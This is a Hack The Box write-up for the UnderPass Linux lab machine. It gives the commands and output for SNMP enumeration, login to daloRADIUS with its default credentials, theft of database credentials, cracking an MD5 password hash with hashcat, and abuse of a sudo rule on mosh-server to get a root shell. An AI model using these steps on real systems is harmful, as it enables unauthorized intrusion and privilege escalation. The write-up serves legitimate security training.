> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2024-12-28

Hack The Box — UnderPass (Linux)

SNMP enumeration exposes a daloRADIUS deployment, default/operator credentials lead to svcMosh, and mosh-server sudo rights are abused to get root.

Target

  • IP: 10.10.11.48

Recon

sudo nmap -sC -sV 10.10.11.48 -p- -T5 -v

Discovered open port 80/tcp on 10.10.11.48
Discovered open port 22/tcp on 10.10.11.48

sudo nmap -sC -sV -sU 10.10.11.48 -T5 -v

Discovered open port 161/udp on 10.10.11.48

Download onesixtyone (https://github.com/trailofbits/onesixtyone).

cd onesixtyone
make
./onesixtyone 10.10.11.48 -c ./dict.txt

10.10.11.48 [public] Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64

snmp-check 10.10.11.48 -p 161 -c public

  Host IP address               : 10.10.11.48
  Hostname                      : UnDerPass.htb is the only daloradius server in the basin!
  Description                   : Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
  Contact                       : steve@underpass.htb
  Location                      : Nevada, U.S.A. but not Vegas
  Uptime snmp                   : 00:35:01.46
  Uptime system                 : 00:34:51.17
  System date                   : 2024-12-27 10:53:56.0

More info:

snmpwalk -v 2c -c public 10.10.11.48

Add underpass.htb to /etc/hosts.

We discovered that underpass.htb is a daloRADIUS server (https://www.daloradius.com/, https://github.com/lirantal/daloradius).

Installation procedure reference:

https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS

Default credentials listed there are:

  • Username: administrator
  • Password: radius

Go to:

http://underpass.htb/daloradius/app/operators

There is a login form.

Log in with the default credentials.

In http://underpass.htb/daloradius/app/operators/config-db.php we find:

DB Engine: MySQLi
Database Port Number: 3306
Database Hostname: localhost
Database User: steve
Database Pass: testing123
Database Name: radius

In http://underpass.htb/daloradius/app/operators/mng-list-all.php we find user svcMosh, with:

username: svcMosh
password: 412DD4759978ACFCC81DEAB01B382403

The password looks like an MD5 hash. We can crack it with hashcat.

hashcat -a 0 -m 0 ./hash ./rockyou.txt

We find password underwaterfriends.

ssh svcMosh@underpass.htb

Enter the cracked password.

sudo -l

Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

sudo /usr/bin/mosh-server new -i 10.10.11.48 -p 9002
MOSH CONNECT 9002 xocDw3oqzjC5OOB6yjoJQg

On the attacker machine:

MOSH_KEY=xocDw3oqzjC5OOB6yjoJQg mosh-client 10.10.11.48 9002

We get a shell as root.